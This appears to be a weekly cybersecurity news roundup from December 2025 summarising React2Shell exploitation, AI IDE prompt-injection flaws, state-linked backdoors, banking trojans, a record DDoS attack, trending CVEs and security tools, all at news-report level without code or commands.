The cybersecurity landscape continues its relentless evolution, with a notable surge in rapid exploitation of critical vulnerabilities and sophisticated attacks targeting both established systems and emerging technologies. This past week saw a critical flaw in a widely used web framework rapidly weaponized, a significant influx of AI-powered tools becoming targets for hackers, and a record-breaking distributed denial-of-service (DDoS) attack. Attackers are demonstrating an unprecedented speed in discovering, publishing, and exploiting new security weaknesses, often within hours, underscoring the urgent need for swift patching and robust defense strategies.
The accelerating pace of cyber threats, coupled with the increasing use of AI in both offensive and defensive capacities, presents a complex challenge for organizations worldwide. From data exfiltration to large-scale disruptions, the methods employed by malicious actors are becoming more agile and diverse. This report delves into the most significant developments from the past week, offering insights into the evolving threat map and the strategies being employed by defenders.
Max Severity React Flaw Comes Under Attack
A critical security vulnerability impacting React Server Components (RSC), tracked as CVE-2025-55182 and nicknamed React2Shell, has been extensively exploited within hours of its public disclosure. This flaw, which carries a CVSS score of 10.0, allows unauthenticated attackers to execute remote code without any special prerequisites. Amazon reported observing attack attempts originating from infrastructure linked to Chinese hacking groups, including Earth Lamia and Jackpot Panda, shortly after the vulnerability was made public. Several cybersecurity firms, including Coalition, Fastly, and Wiz, have corroborated these findings, noting widespread exploitation efforts by multiple threat actors.
The Shadowserver Foundation reported a significant decrease in vulnerable IP addresses detected for the React2Shell flaw, dropping from over 77,000 on December 5, 2025, to approximately 29,000 by December 7. Despite this reduction, a substantial number of vulnerable systems remain exposed, with a notable concentration in the U.S., Germany, and China. The swift exploitation of this flaw highlights the critical importance of rapid patch deployment for widely used software frameworks.
Top News in Cybersecurity
Over 30 Flaws in AI-Powered IDEs
Security researcher Ari Marzouk has detailed over 30 security vulnerabilities discovered in various AI-powered Integrated Development Environments (IDEs). These vulnerabilities, collectively termed IDEsaster, leverage prompt injection techniques in conjunction with legitimate features to facilitate data exfiltration and enable remote code execution. Marzouk indicated that AI IDEs often underestimate the threat model presented by existing IDE features, which can be weaponized when integrated with autonomous AI agents. Patches for these issues have been released, with Anthropic acknowledging the associated risks.
Chinese Hackers Use BRICKSTORM to Target U.S. Entities
The U.S. government has issued an advisory concerning the use of a backdoor named BRICKSTORM by China-linked threat actors, including UNC5221 and Warp Panda. This sophisticated backdoor is designed for persistence in VMware vSphere and Windows environments, enabling stealthy access and secure command-and-control capabilities. The ongoing use of BRICKSTORM raises concerns about China’s sustained ability to infiltrate critical infrastructure and government networks undetected for extended periods, often utilizing living-off-the-land techniques to evade detection.
GoldFactory Targets Southeast Asia with Bogus Banking Apps
The financially motivated cybercriminal group GoldFactory has launched a new campaign targeting mobile users in Indonesia, Thailand, and Vietnam. This operation involves distributing modified banking applications that deliver Android malware. Group-IB reported identifying over 300 unique samples of these applications, leading to nearly 2,200 infections in Indonesia. The attacks often impersonate government entities and local brands, luring victims into installing malware through deceptive links sent via messaging apps. These links redirect users to fake app store pages, resulting in the deployment of remote access trojans that abuse Android’s accessibility services for remote control.
Cloudflare Blocks Record 29.7 Tbps DDoS Attack
Cloudflare successfully mitigated the largest distributed denial-of-service (DDoS) attack on record, measuring 29.7 terabits per second (Tbps). The attack, which lasted 69 seconds, originated from the AISURU botnet-for-hire, previously linked to numerous hyper-volumetric DDoS attacks. The target of this specific attack was not disclosed, but the botnet has previously focused on telecommunications providers, gaming companies, hosting providers, and financial services. Cloudflare also addressed a 14.1 billion packets per second (Bpps) DDoS attack from the same botnet, which is estimated to comprise between 1 to 4 million infected hosts globally.
Brazil Hit by Banking Trojan Spread via WhatsApp Worm
Brazilian users are currently facing multiple campaigns distributing banking malware through WhatsApp Web. One campaign, attributed to the threat actor Water Saci, delivers a variant of the Casbaneiro banking trojan, while another cluster, tracked by Sophos as STAC3150, deploys the Astaroth banking trojan. These attacks utilize malicious VBS or HTA files within ZIP archives, which then launch PowerShell to retrieve secondary payloads. This includes scripts that collect WhatsApp user data and ultimately install the Astaroth malware. The trust inherent in messages from known contacts is exploited to bypass user caution, increasing the likelihood of malware execution.
Trending CVEs
The rapid exploitation of newly discovered vulnerabilities is a persistent threat. Organizations must prioritize patching and security updates to mitigate risks. This week’s notable CVEs include a range of issues across different software and platforms, emphasizing the need for continuous vigilance and proactive security management.
This week’s list includes: CVE-2025-6389 (Sneeit Framework plugin), CVE-2025-66516 (Apache Tika), CVE-2025-55182 (React), CVE-2025-9491 (Microsoft Windows), CVE-2025-10155, CVE-2025-10156, CVE-2025-10157 (Picklescan), CVE-2025-48633, CVE-2025-48572 (Google Android), CVE-2025-11699 (nopCommerce), CVE-2025-64775 (Apache Struts), CVE-2025-59789 (Apache bRPC), CVE-2025-13751, CVE-2025-13086, CVE-2025-12106 (OpenVPN), CVE-2025-13658 (Industrial Video & Control Longwatch), CVE-2024-36424 (K7 Ultimate Security), CVE-2025-66412 (Angular), CVE-2025-13510 (Iskra iHUB and iHUB Lite), CVE-2025-13372, CVE-2025-64460 (Django), CVE-2025-13486 (Advanced Custom Fields: Extended plugin), CVE-2025-64772 (Sony INZONE Hub), CVE-2025-64983 (SwitchBot), CVE-2025-31649, CVE-2025-31361 (Dell ControlVault), CVE-2025-47151 (Entr’ouvert Lasso), CVE-2025-66373 (Akamai), CVE-2025-13654 (Duc), CVE-2025-13032 (Avast), CVE-2025-33211, CVE-2025-33201 (NVIDIA Triton), CVE-2025-66399 (Cacti), CVE-2025-20386, CVE-2025-20387 (Splunk), and CVE-2025-66476 (Vim for Windows).
Around the Cyber World
Compromised USBs Used for Crypto Miner Delivery
An ongoing campaign since September 2024 has been observed utilizing USB drives to spread cryptocurrency miners across infected hosts. The latest iteration uses a batch script to launch a dropper DLL that deploys PrintMiner, which then installs additional payloads like XMRig. The malware is concealed within a folder, only visible via a shortcut file, making it difficult for users to detect infection. Concurrently, a separate campaign targets Linux systems with a Mirai-derived botnet that deploys a stealthy, fileless cryptocurrency miner, dynamically configured at runtime.
Fake Cryptocurrency Investment Domain Seized
The U.S. Department of Justice’s Scam Center Task Force has seized Tickmilleas[.]com, a domain used by scammers operating from Burma to perpetrate cryptocurrency investment fraud against Americans. The website was disguised as a legitimate investment platform, leading victims to believe they were seeing lucrative returns before their funds were stolen. Meta has also removed approximately 2,000 accounts associated with the same scam compound, and several fraudulent apps hosted on Google Play Store and Apple App Store that were linked to the domain have been taken down. Separately, Cambodian officials raided a cyber scam compound and arrested 28 suspects, primarily Vietnamese nationals, as cyber scam operations increasingly shift to new locations within the region.
Portugal Modifies Cybercrime Law to Exempt Researchers
Portugal has amended its cybercrime law to provide a legal safe harbor for white hat security research. Under specific conditions, such activities are now exempt from punishment. These conditions include the intention to improve cybersecurity through disclosure, not seeking financial gain, promptly reporting vulnerabilities to the system owner, deleting data obtained within 10 days of a fix, and adhering to data privacy regulations like GDPR. This move mirrors similar legislative proposals in other countries aimed at fostering responsible vulnerability disclosure.
CastleRAT Malware Detailed
The remote access trojan (RAT) known as CastleRAT has been observed in the wild, with both Python and C versions documented. The C build is noted to be more powerful and may include additional features. CastleRAT gathers system information, including computer name, username, and IP address, which is then transmitted to its command-and-control (C2) server. It also possesses the capability to download and execute further files, offering attackers a remote shell to run commands on compromised machines. This malware is attributed to a threat actor known as TAG-150.
DoJ Indicts Brothers for Wiping 96 Government Databases
Two brothers from Virginia, Muneeb and Sohaib Akhter, have been indicted by the U.S. Department of Justice for allegedly conspiring to steal sensitive information and deleting 96 government databases. The incident occurred shortly after they were terminated from their contractor roles. The databases contained information related to Freedom of Information Act requests and sensitive investigative files from multiple federal agencies, including the IRS and DHS. The brothers reportedly used an artificial intelligence tool to inquire about clearing system logs of their actions. This indictment follows a previous sentencing in 2015 for similar offenses, highlighting a concerning pattern of behavior.
U.K. NCSC Debuts Proactive Notifications
The U.K.’s National Cyber Security Centre (NCSC) has initiated a testing phase for its new Proactive Notifications service. This service, delivered in partnership with cybersecurity firm Netcraft, aims to inform organizations of vulnerabilities present within their environments. The notifications are based on publicly available information and internet scanning, designed to responsibly alert system owners and aid in protecting their services. This proactive approach complements traditional reactive incident response.
FinCEN Ransomware Trend Analysis Reveals Drop in Payments
A recent analysis by the U.S. Department of the Treasury’s Financial Crimes Enforcement Network (FinCEN) indicates a decrease in reported ransomware incidents in 2024, with 1,476 incidents noted following law enforcement actions against major ransomware groups. Financial institutions paid approximately $734 million to ransomware gangs, a reduction from $1.1 billion in 2023. The median ransomware payment in 2024 was $155,257, with the most common payment range between 2022 and 2024 being below $250,000. Akira led in reported incidents, while BlackCat received the highest total payment amount.
Bangladeshi Student Behind New Botnet
A student hacker from Bangladesh is reportedly behind a new botnet targeting WordPress and cPanel servers. This operation utilizes a botnet panel to distribute compromised websites to buyers, primarily Chinese threat actors. The compromised sites are often injected with the Beima PHP web shell. Government and education sectors are the main targets, accounting for 76% of the websites offered for sale. The perpetrator claims to be selling access to over 5,200 compromised websites on Telegram to fund their education, with Chinese threat actors constituting the majority of customers.
U.S. State Department Offers $10m Reward for Iranian Hacker Duo
The U.S. State Department has announced a $10 million reward for information leading to the capture of two Iranian nationals, Fatemeh Sedighian Kashi and Mohammad Bagher Shirinkar. These individuals are linked to Iran’s cyber operations and allegedly work for a company associated with the Islamic Revolutionary Guard Corps Cyber-Electronic Command (IRGC-CEC). The State Department states that members of this entity have caused significant financial damage and disruption to U.S. businesses and government agencies through coordinated cyber and information operations targeting critical infrastructure sectors across the U.S., Europe, and the Middle East.
New Arkanix and Sryxen Stealers Spotted
Two new information stealers, Arkanix and Sryxen, are being marketed for their ability to steal sensitive data and generate quick financial gains. Sryxen, written in C++, uses advanced techniques, including DPAPI decryption and a bypass for Chrome’s new App-Bound Encryption by leveraging the DevTools Protocol. Its anti-analysis features are notably sophisticated. These disclosures coincide with a campaign known as AIRedScam, which utilizes malicious AI tools shared on GitHub to distribute infostealers, specifically targeting cybersecurity professionals seeking automation tools for enumeration and reconnaissance.
FBI Warns of Virtual Kidnapping Ransom Scams
The U.S. Federal Bureau of Investigation (FBI) has issued a warning about a rise in virtual kidnapping ransom scams. Perpetrators contact victims via text message, falsely claiming to have kidnapped a loved one and demanding ransom. They often provide seemingly authentic photos or videos, sometimes sent with timed message features to limit the victim’s ability to verify their authenticity, as fabricated proof-of-life. These scams exploit publicly available images from social media platforms and other online sources.
Russian Hackers Spoof European Security Events in Phishing Wave
Threat actors originating from Russia have intensified their targeting of Microsoft and Google environments by exploiting OAuth and Device Code authentication workflows for credential phishing. These attacks involve creating fake websites that impersonate legitimate European security events. Users who register for these events are tricked into granting unauthorized access to their accounts. A notable tactic in this wave includes offering “live support” via messaging apps to assist targeted users in completing the phishing process. These campaigns are attributed to a cyber espionage group known as UTA0355.
Shanya PaaS Fuels New Attacks
A packer-as-a-service (PaaS) offering called Shanya has emerged as a tool for decrypting and loading malicious programs capable of disabling endpoint security solutions. The attack chain exploits a vulnerable legitimate driver and a malicious unsigned kernel driver to achieve its objectives. The user-mode component identifies and terminates security processes and services by sending kill commands to the malicious kernel driver. This driver then abuses the vulnerable legitimate driver to gain write access, enabling the termination and deletion of protection products. Shanya has been used in ransomware operations, including Medusa, Akira, Qilin, and Crytox, and has also distributed CastleRAT.
Cybersecurity Webinars
Cybersecurity Tools
RAPTOR: This open-source AI-powered security tool automates code scanning, fuzzing, vulnerability analysis, and exploit generation. It is designed to efficiently test software for bugs, validate vulnerabilities, and conduct OSS forensics by chaining multiple tools and using an AI agent for guidance.
Google Threat Intelligence Browser Extension: Aimed at security analysts and threat researchers, this extension highlights suspicious IPs, URLs, domains, and file hashes directly within the browser, providing instant context for threat investigation and collaboration.
Disclaimer: These tools are intended for educational and research purposes only and may not have undergone comprehensive security testing. Improper use could lead to harm. Users are advised to review code, test in isolated environments, and comply with all applicable laws and regulations.
Conclusion
The week’s developments underscore a continuing trend where innovation in technology is quickly mirrored by advancements in exploitation. The rapid discovery and weaponization of vulnerabilities, alongside the dual-use nature of AI, demand a proactive and adaptive approach to cybersecurity. Staying informed, implementing timely patches, and fostering a culture of shared knowledge are critical for navigating this dynamic threat landscape. The consistent emergence of new attack vectors emphasizes that vigilance and a layered defense strategy remain paramount.